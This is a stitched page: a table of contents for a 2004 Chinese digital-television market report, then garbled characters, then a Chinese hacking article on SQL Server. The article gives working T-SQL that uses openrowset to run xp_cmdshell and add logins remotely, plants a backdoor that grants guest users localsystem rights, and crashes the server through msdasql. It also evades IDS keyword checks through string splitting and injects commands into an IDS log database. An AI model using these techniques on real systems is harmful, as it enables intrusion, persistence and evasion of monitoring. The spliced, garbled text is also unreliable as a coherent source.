|
前 言
报告目的
研究范围
调研方法
调研对象
数据来源
报告特点
适用读者
第一部分 往年报告回顾
1.1 2003年中国数字电视总体情况
1.2 2003年中国数字电视用户达27.6万
1.3 数字电视进程需要政策及商业的双重推动
1.4 我国数字电视与付费电视同轨运行
1.5 节目内容的缺乏是数字电视发展的瓶颈
1.6 电视地域性经营的格局亟待打破
1.7 2003年全球数字电视发展特点
1.8 视频点播管理规定应作调整
1.9 付费节目集成运营平台的垄断将被打破
1.10 有线、卫星与地面的整体考虑
1.11 移动电视具有很好的市场前景
第二部分 数字电视的内涵与外延
2.1 基本概念
2.2 数字电视的分类
2.3 数字电视相关标准
2.4 数字电视产业链构成
第三部分 2004年全球数字电视发展概况
3.1 世界各国关闭模拟播出时间表
3.2 2004年全球数字电视进展
3.3 欧洲数字电视发展概况与特点
3.4 英国数字电视发展概况
3.5 美国数字电视进展
3.6 意大利数字电视进展
3.7 德国数字电视进展
3.8 韩国数字电视进展
3.9 日本数字电视进展
3.10 2004年全球数字电视发展特点
第四部分 中国数字电视产业背景分析
4.1 我国广电业基本现状
4.2 2004年中国广播影视业经营状况
4.3 数字电视相关行业发展状况
4.4 发展数字电视意义重大
第五部分 数字电视发展规划及产业政策
5.1 我国数字电视发展历程
5.2 中国数字电视战略规划
5.3 中国数字电视相关政策分析
5.4 下一步政策走向分析
第六部分 2004年中国数字电视市场分析
6.1 2004年中国数字电视总体情况
6.2 我国103个地区数字电视业务概况
6.3 数字电视运营主体
6.4 数字电视业务构成
6.5 机顶盒营销推广策略
6.6 对整体转换的看法
第七部分 整体转换盈利模式研究
7.1 运行模式及条件设定
7.2 财务测算
7.3 模式分析
第八部分 数字电视运营个案分析
8.1 青岛模式
8.2 佛山经验
8.3 杭州做法
8.4 江西数字电视发展
8.5 绵阳数字电视发展
第九部分 中国付费电视发展状况
9.1 付费电视是我国广电业发展的方向
9.2 付费电视相关发展政策
9.3 付费频道发展现状
9.4 五大集成平台运营现状
9.5 付费电视现状分析
第十部分 移动电视及IPTV发展概况
10.1 移动电视技术标准与实现方式
10.2 中国车载移动电视业务概况
10.3 手机电视业务概况
10.4 IPTV业务进展
第十一部分 数字电视投资机会分析
11.1 数字电视市场规模
11.2 数字电视投资机会
11.3 投资风险及防范
第十二部分 产业趋势及发展预测
12.1 中国数字电视产业发展特点与趋势
12.2 关联产业的用户发展规律
12.3 数字电视发展的影响因素
12.4 中国数字电视用户发展预测
第十三部分 附录
13.1 数字电视相关政策与文件一览表
13.2 建立有线数字电视技术新体系的实施意见
[report-page]13.3 我国有线电视向数字化过渡时间表
13.4 广播电视有线数字付费频道业务管理暂行办法(试行)
13.5 关于推进广播电视有线数字付费频道运营产业化的意见
13.6 关于加强地面数字电视试验管理的通知
13.7 广播电视视频点播业务管理办法
13.8 互联网等信息网络传播视听节目管理办法
13.9 用户管理系统(SMS)入网测评认证产品一览表
13.10 条件接收系统(CAS)入网测评认证产品一览表
13.11 中国数字电视发展大事记
表格目录:
表格 1:美国数字电视扫描格式(自ATSC 标准文件)
表格 2:欧洲部分国家数字电视用户总数数及2009年预测
表格 3:英国数字电视用户构成
表格 4:美国前二十位数字电视运营商
表格 5:部分国家停播模拟电视时间表预测
表格 6:我国广播电视基本情况统计数据
表格 7:2000-2004广电广告收入及在广告市场中的比例
表格 8:2003年中央电视台及省级电视台广告收入一览表
表格 9:2003年各地卫视频道广告收入一览表
表格 10:不同方式上网用户数
表格 11:上网用户对互联网主要服务的满意度
表格 12:有线数字电视试点单位一览表(I)
表格 13::有线数字电视试点单位一览表(II)
表格 14:节目发行次序时间表
表格 15:2003年数字电视试点基本情况表
表格 16:整体转换财务测算表
表格 17:批准开办的付费电视频道一览表
表格 18:付费广播频道一览表
表格 19:有线数字付费电视联合体成员
表格 20:移动电视及手机电视技术标准一览表
表格 21:手机电视产业链构成
表格 22:全球各国IPTV主要运营商
图表目录:
图表 1:AVS标准在音视频标准史上的位置
图表 2:AVS产业链示意图
图表 3:各国停止模拟播出时间表
图表 4:2004年全球数字电视渗透率比较
图表 5:全球数字电视用户发展及预测
图表 6:2004年英国数字电视运营商市场份额
图表 7:英国1998-2004数字电视及多频道渗透率情况
图表 8:全球数字付费电视订户现状及预测
图表 9:广电行业总收入(1982-2004)
图表 10:2004年中国广电行业收入构成及比例
图表 11:广播电视及报刊在广告市场的份额比较
图表 12:2000-2004中国广告市场及其份额
图表 13:历次调查上网计算机总数
图表 14:历次调查上网用户总数
图表 15:历年调查不同上网方式用户数
图表 16:最近3次调查不同方式上网用户数增长率
图表 17:网民上网地点对比
图表 18:历次调查网民在家中/单位上网的比例
图表 19:历次调查使用其他设备上网用户数
图表 20:用户上网时间调查
图表 21:用户每月上网实际花费
图表 22:2004年数字电视相关行业用户数量
图表 23:中国有线数字电视用户发展情况(2002-2004)
图表 24:中国有线数字电视用户年增长量(2002-2004)
图表 25:中国数字电视用户网络分布
图表 26:2003年中国数字电视用户试点分布图
图表 27:2004年中国数字电视用户地区分布
图表 28:中国有线电视网络的数字电视渗透率比较
图表 29:数字电视平台的业务种类现状
图表 30:用户对目前DTV信息服务的满意度
图表 31:整体转换地区及数字电视用户比较
图表 32:“一卡一费”模式采用情况
图表 33:运营商对整体转换模式的看法
图表 34:整体转换面临的主要问题
图表 35:欧洲几个国家付费电视渗透率比较
图表 36:我国付费电视产业链构成
图表 37:付费频道开办机构级别及数量
图表 38:付费频道开办机构的类别及数量
图表 39:付费频道主要开办机构及频道数量对比
图表 40:运营商对五家集成运营平台的看法
图表 41:运营商希望与集成平台的合作方式
图表 42:运营商对频道价格制定方式的看法
图表 43:运营商对付费频道分帐比例的看法
图表 44:运营商对两级CA的看法
图表 45:运营商对CHC分帐比例的看法
图表 46:全球及中国的电视、互联网及手机用户对比
图表 47:互联网上网计算机发展曲线
图表 48:移动电话用户增长曲线
图表 49:中国影碟机发展曲线
图表 50:数字电视相关产品发展曲线
图表 51:中国有线数字电视用户发展预测
图表 52:监管平台系统机构图苑⑾郑桓乙桓鋈硕老恚贸隼辞氪蠹?
鉴别,当然很有可能有些高手早已知道了,毕竟我接触sqlserver的时间不到1年:P
1。关于openrowset和opendatasource
可能这个技巧早有人已经会了,就是利用openrowset发送本地命令
通常我们的用法是(包括MSDN的列子)如下
select * from openrowset('sqloledb','myserver';'sa';'','select * from table')
可见(即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问,它必须跟在select后面,也就是说需要返回一个recordset
那么我们能不能利用它调用xp_cmdshell呢?答案是肯定的!
select * from openrowset('sqloledb','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshell ''dir c:\''')
必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置,这样xp_cmdshell返回的output集合就会提交给前面的select显示,如果采用默认设置,会返回空集合导致select出错,命令也就无法执行了。
那么如果我们要调用sp_addlogin呢,他不会像xp_cmdshell返回任何集合的,我们就不能再依靠fmtonly设置了,可以如下操作
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin Hectic')
这样,命令至少会返回select 'OK!'的集合,你的机器商会显示OK!,同时对方的数据库内也会增加一个Hectic的账号,也就是说,我们利用
select 'OK!'的返回集合欺骗了本地的select请求,是命令能够正常执行,通理sp_addsrvrolemember和opendatasource也可以如此操作!至于
这个方法真正的用处,大家慢慢想吧:P
2。关于msdasql两次请求的问题
不知道大家有没有试过用msdasql连接远程数据库,当然这个api必须是sqlserver的管理员才可以调用,那么如下
select * from openrowset('msdasql','driver={sql
server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn','select * from table1 select * from table2')
当table1和table2的字段数目不相同时,你会发现对方的sqlserver崩溃了,连本地连接都会失败,而系统资源占用一切正常,用pskill杀死
sqlserver进程后,如果不重启机器,sqlserver要么无法正常启动,要么时常出现非法操作,我也只是碰巧找到这个bug的,具体原因我还没有
摸透,而且很奇怪的是这个现象只出现在msdasql上,sqloledb就没有这个问题,看来问题不是在于请求集合数目和返回集合数目不匹配上,因
该还是msdasql本身的问题,具体原因,大家一起慢慢研究吧:P
3。可怕的后门
以前在网上看到有人说在sqlserver上留后门可以通过添加triger,jobs或改写sp_addlogin和sp_addsrvrolemember做到,这些方法当然可行,
但是很容易会被发现。不知道大家有没有想过sqloledb的本地连接映射。呵呵,比如你在对方的sqlserver上用sqlserver的管理员账号执行如下的命令
select * from openrowset('sqloledb','trusted_connection=yes;data source=Hectic','set fmtonly off exec master..xp_cmdshell ''dir c:\''')
这样在对方的sqlserver上建立了一个名为Hectic的本地连接映射,只要sqlserver不重启,这个映射会一直存在下去,至少我现在还不知道如何发现别人放置的连接映射
,好了,以上的命令运行过后,你会发现哪怕是sqlserver没有任何权限的guest用户,运行以上这条命令也一样能通过!而且权限是localsystem!(默认安装)呵呵!这个方法可以用来在以被入侵过获得管理员权限的sqlserver上留下一个后门了。
以上的方法在sqlserver2000+sqlserver2000SP1上通过!
*另外还有一个猜测,不知道大家有没有注意过windows默认附带的两个dsn,一个是localserver一个是msqi,这两个在建立的时候是本地管理
员账号连接sqlserver的,如果对方的sqlserver是通过自定义的power user启动,那么sa的权限就和power user一样,很难有所大作为,但是
我们通过如下的命令
select * from openrowset('msdasql','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:\''')应该可以利用localserver的管理员账号连接本地sqlserver然后再以这个账号的权限执行本地命令了,这是后我想应该能突破sa那个power user权限了。现在的问题是sqloledb无法调用dsn连接,而msdasql非管理员不让调用,所以我现在正在寻找guest调用msdasql的方法,
如果有人知道这个bug如何突破,或有新的想法,我们可以一起讨论一下,这个发放如果能成功被guest利用,将会是一个很严重的安全漏洞。
因为我们前面提到的任何sql语句都可以提交给对方的asp去帮我们执行:P
利用t-sql骗过ids或攻击ids
现在的ids已经变得越来越聪明了
有的ids加入了xp_cmdshell sp_addlogin 的监视 。
但是毕竟人工智能没有出现的今天,这种监视总是有种骗人的感觉
先说说欺骗ids:
ids既然监视xp_cmdshell关键字,那么我们可以这么做
declare @a sysname set @a="xp_"+"cmdshell" exec @a 'dir c:\'
这个代码相信大家都能看明白,还有xp_cmdshell作为一个store procedure在master库内有一个id号,固定的,我们也可以这么做
假设这个id=988456
declare @a sysname select @a=name from sysobjects where id=988456 exec @a 'dir c:\'
当然也可以
declare @a sysname select @a=name from sysobjects where id=988455+1 exec @a 'dir c:\'
这种做法排列组合,ids根本不可能做的到完全监视
同理,sp_addlogin也可以这么做
再说说攻击ids:
因为ids数据量很大,日至通常备份到常规数据库,比如sql server
如果用古老的recordset.addnew做法,会严重影响ids的性能,因为通过ado做t-sql请求,不但效率高,而且有一部分工作可以交给sql server 去做
通常程序会这么写ues ('日至内容',...)
那么我么想想看,如果用
temp') exec xp_cmdshell 'dir c:\' --
提交后会变成
insert table values ('日至内容'....'temp') exec xp_cmdshell 'dir c:\' -- ')
这样,xp_cmdshell就可以在ids的数据库运行了 :)
当然ids是一个嗅叹器,他会抓所有的报,而浏览器提交的时候会把空格变成%20
因此,%20会被提交到sql server,这样你的命令就无法执行了
唯一的办法就是
insert/**/table/**/values('日至内容'....'temp')/**/exec/**/xp_cmdshell/**/'dir c:\'/**/-- ')
用/**/代替空格做间隔符,这样你的t-sql才能在ids的数据库内执行
当然也可以用其他语句,可以破坏,备份ids的数据库到你的共享目录
呵呵
其实这种方法的原理和攻击asp是一样的,只是把空格变成了/**/
本来asp是select语句,那么用'就可以屏蔽
现在ids用insert语句,那么用')屏蔽
好了,其他很多新的入侵语句大家可以自己慢慢想,最好的测试工具就是query analyzer了。
更多windows安全信息,请关注 windows 安全专题
(责任编辑 邹文标)
| 
2007年02月05日
